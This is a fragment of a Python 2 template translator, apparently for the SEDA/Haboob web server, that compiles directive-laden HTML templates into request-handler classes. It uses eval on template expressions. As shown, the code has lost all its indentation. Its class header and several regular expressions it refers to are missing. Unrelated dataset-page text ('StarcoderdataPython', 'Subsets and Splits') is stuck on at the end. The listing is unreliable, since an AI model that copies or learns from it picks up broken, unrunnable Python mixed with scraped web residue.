whitespace = re.compile('^(\s*)')
colon = re.compile(':')
rest = re.compile('(.*$)', re.DOTALL)
include = re.compile('<%include (.*)>')
def __init__(self, filename):
self.filename = filename
self.page = read_page(filename)
# self.page = open(filename).read()
def translate(self):
curr = 0
source = []
while(1):
ordinary = self.nondirective.search(self.page, curr)
if not ordinary:
# no more directives
ordinary = self.rest.search(self.page, curr)
plaintext = ordinary.group(1).strip()
# print 'print """%s""",' % plaintext
source.append('print >> _pytec_out, """%s""",' % plaintext)
break # we're done
if self.non_whitespace.search(ordinary.group(1)):
plaintext = ordinary.group(1).strip()
# print 'print """%s""",' % plaintext
source.append('print >> _pytec_out, """%s""",' % plaintext)
curr = ordinary.end()
special = self.directive.search(self.page, curr)
if not special:
raise TranslationError
command = special.group(1)
if command.startswith('pytec'):
# this is a regular directive
# everything after the first \n
command = command[command.find('\n') + 1:]
lines = command.split('\n')
lines = map(
lambda x:re.sub('^(\s*)print\s*(?!>)', '\g<1>print >> _pytec_out, ', x),
lines
)
# print command
source.extend(lines)
elif command[0] == '!':
# this is a directive we have to place with the proper indent
command = command[1:].strip()
# print command
source.extend(command.split('\n'))
elif command[0] == '=':
# we print the result of this directive
# should we check to ensure that this is a single statement?
command = command[1:].strip()
# print 'print eval(r"""' + command + '"""),'
source.append('_pytec_out.softspace = 0')
source.append('print >> _pytec_out, eval(r"""' + command + '"""),')
source.append('_pytec_out.softspace = 0')
else:
print source
raise TranslationError
curr = special.end()
print 'from __future__ import nested_scopes'
print 'from seda.sandStorm.core import *'
print 'from seda.sandStorm.lib.http import *'
print 'from seda.apps.Haboob.hdapi import *'
#print 'from java.lang import *'
print 'import java'
print 'import StringIO'
print
print 'class %s(httpRequestHandlerIF):' % self.filename.split('.')[0]
print '\tdef handleRequest(self, req):'
print '\t\t_pytec_out = StringIO.StringIO()'
for line in source:
print '\t\t%s' % line
print '\t\toutstring = "".join(_pytec_out.buflist)'
print '\t\tresp = httpOKResponse("text/html", BufferElement(outstring))'
print '\t\treturn resp'
print
print 'def error(msg):'
print '\tresp = httpOKResponse("text/html", BufferElement(msg))'
print '\treturn resp'
if __name__ == '__main__':
import sys
if not sys.argv[1]:
print "Must provide filename"
sys.exit()
tt = TemplateTranslator(sys.argv[1])
tt.translate()
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.